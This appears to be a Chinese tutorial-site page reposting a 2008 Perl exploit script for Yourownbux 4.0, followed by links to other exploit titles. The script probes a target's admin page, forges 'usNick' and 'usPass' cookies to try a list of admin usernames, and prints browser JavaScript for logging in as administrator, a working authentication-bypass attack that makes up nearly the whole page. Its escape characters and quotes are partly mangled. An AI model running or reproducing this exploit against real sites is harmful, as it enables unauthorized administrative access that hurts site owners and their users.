手机
当前位置:查字典教程网 >网络安全 >Exploit >Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useHTTP::Request;#-------------------...

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Request;

# ------------------------------------------------------------------------------------------------- -#

# Yourownbux v4.0 ------------------------------------------------------------ --

# Cookie Modification Exploit -----------------------------------------------------------------

# Discovered By: Tec-n0x | 04/9/2008 --------------------------------------------------------

#

# Dropsec.com

#

# Modify The Line 39, Adding More User's that can be the admin username------------

#

# Gr33tz: Celciuz, OzX, N.O.X, MurdeR, Syst3m-c0d3r && All Friends --

# ------------------------------------------------------------- ----------------------------------------#

system("clear");

print "

# Yourownbux v4.0 Cookie Modification Exploitn# Discovered By: Tec-n0xnn# Tec-n0x [ at ] hotmail [ dot ] com > DropSec.com

nn";

print "Target [ Example: www.sitedemo.com ] :n> ";

$target = <STDIN>;

chop($target);

if($target =~ m/www.(.*).(.*)/) {

$other = $1;

check1($target);

} else {

print "nInvalid Target.";

exit();

}

sub explote {

@tryusers = ("admina", "administrator", "admins", "admin", "master", "manager", "root", "$other");

# Add Posible Users.

$check = shift;

foreach $user (@tryusers) {

$pass = "Tec-n0x";

print "ntTrying > $usern";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$browser->default_header("Cookie" => "usNick=$user; usPass=$pass");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/Emails|Served|Workload|Overview/) {

system("clear");

print "Succesfull EXPLOTED ...!!nnValid Username: $usernnGo to: $checknn And Put this on your browser:";

$vd = "javascript:document.cookie = "usNick=$user; path=/";";

$vda = "javascript:document.cookie = "usPass=Dropsec.com; path=/";";

print "

------------------------------------

$vdn $vda

------------------------------------

";

$yes = 1;

exit();

}

}

}

if($yes != 1) {

print "nnnExploit Failed";

exit();

}

}

sub check1 {

$target = shift;

$check = "http://$target/admin/index.php";

$browser = LWP::UserAgent->new();

$browser->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14");

$get = HTTP::Request->new(GET => $check);

$resp = $browser->request($get);

$content = $resp->content();

@code = split("n",$content);

foreach $checka (@code) {

if($checka =~ m/You must login as administrator to access this page/) {

print "Check 1 [ OK ]n";

$success = 1;

explote($check);

}

}

if($sucess != 1) {

print "Failed";

exit();

}

}

【Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit】相关文章:

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

精品推荐
分类导航